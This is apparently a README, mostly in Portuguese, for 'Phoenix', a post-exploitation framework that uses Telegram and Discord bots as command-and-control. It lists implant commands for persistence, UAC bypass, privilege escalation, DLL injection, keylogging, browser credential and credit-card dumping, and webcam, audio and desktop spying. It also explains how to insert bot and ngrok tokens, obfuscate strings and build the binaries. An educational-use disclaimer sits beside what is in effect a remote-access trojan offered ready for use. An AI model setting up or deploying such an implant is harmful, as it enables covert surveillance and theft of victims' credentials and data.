
Framework de pós-exploração que abusa de sites confiáveis como Telegram e Discord para C2.
Phoenix é um framework de pós-exploração baseado em async que abusa de sites confiáveis para C2.
Phoenix atualmente suporta as seguintes plataformas através de suas APIs de Bot:
Phoenix oferece os seguintes recursos básicos:
Command Description
------- -----------
/hello Check if the bot is acive on the host
/help Print help message
/persist Maintain access after reboot. (Requires UAC bypass)
/sleep Sleep. Usage: /sleep (seconds)
/reboot Reboot the host
/shutdown Shutdown the host
/exit End the session
/self_del Self-delete the executable
/pwd Print working directory
/dir List working directory
/cd Change directory. Usage: /cd (path)
/search Search for files. Usage: /search (path) (file)
/upload Upload files. Usage: /upload (file), /upload *.jpg
/uid Get the user id
/users List the available users
/privs List the privileges
/sysinfo Print system informations
/location Retrieve geolocation informations
/hw List installed hardware
/sw list installed software
/drv List connected drives
/net List network Adapters
/pid Show the current process ID
/ps List running processes
/pkill Kill a process by ID
/exec Execute a command
/chat Display a custom message
/webcam_list List available webcams
/webcam_snap Take a webcam snapshot: Usage: /webcam_snap (index)
/recaudio Record audio. Usage: /recaudio (seconds)
/screenshot Take a screenshot
/keylog Start keylogging
/keylog_stop Stop keylogging threads
/browser_dump Dump browser data
/clipboard Dump clipboard data
/stream_desktop Live stream the host desktop
/stream_webcam Live stream the host webcam
/stream_stop Stop live streaming threads *** needs work
/get_system Elevate privileges to SYSTEM
/bypass_uac Bypass UAC prompts
/inject Inject a target process. Usage: /inject (dll_path)
[!NOTE]
Phoenix suporta coleta de dados dos seguintes navegadores:
Chrome,Edge,Brave, efirefox.
- A descriptografia de senhas do Firefox não é suportada atualmente!
- O módulo de extração Chromium é baseado no projeto open source: https://github.com/Maldev-Academy/DumpBrowserSecrets/tree/main/DllExtractChromiumSecrets.
A tabela abaixo mostra a lista de dados coletados para cada navegador suportado :
Phoenix atualmente implementa ofuscação XOR simples, o que significa que os tokens ainda estarão codificados no binário. A ofuscação é apenas uma defesa básica para evitar inspeção casual de strings, não para impedir engenheiros reversos habilidosos.
Ngrok é essencial para tunelar o tráfego de transmissão ao vivo, o Phoenix não seria capaz de transmitir a área de trabalho/webcam do host sem um token ngrok adequado.
/src/tunnel.rs, substitua a variável token pelo seu token real:let token = obfuscate!("YOUR_NGROK_TOKEN");
/src/telegram.rs, substitua as variáveis bot_token e id pelo seu token de bot real e id do chat:let bot_token = obfuscate!("YOUR_TELEGRAM_TOKEN");
let id: i64 = 123456789;
> cargo build --release --bin telegram
/src/discord.rs, substitua a variável token pelo seu token de bot real:let token = obfuscate!("YOUR_DISCORD_TOKEN");
> cargo build --release --bin discord
[!IMPORTANT] Os binários gerados exigem privilégios de administrador para funcionar corretamente.
screenshot
[!CAUTION] Este projeto é fornecido apenas para fins educacionais e de pesquisa. Você é responsável por garantir que possui autorização adequada antes de usar esta ferramenta. O autor não assume nenhuma responsabilidade por uso indevido.
Contribuições e sugestões são bem-vindas! Se você tiver consultas comerciais "éticas" ou quiser colaborar, sinta-se à vontade para entrar em contato pelo e-mail: [email protected]
| Chrome/Edge/Brave | Firefox |
|---|
| History | ✅ | ✅ |
| Cookies | ✅ | ✅ |
| Autofills | ✅ | ✅ |
| Credi Cards | ✅ | ✅ |
| Cookies | ✅ | ✅ |
| logins | ✅ | ❌ |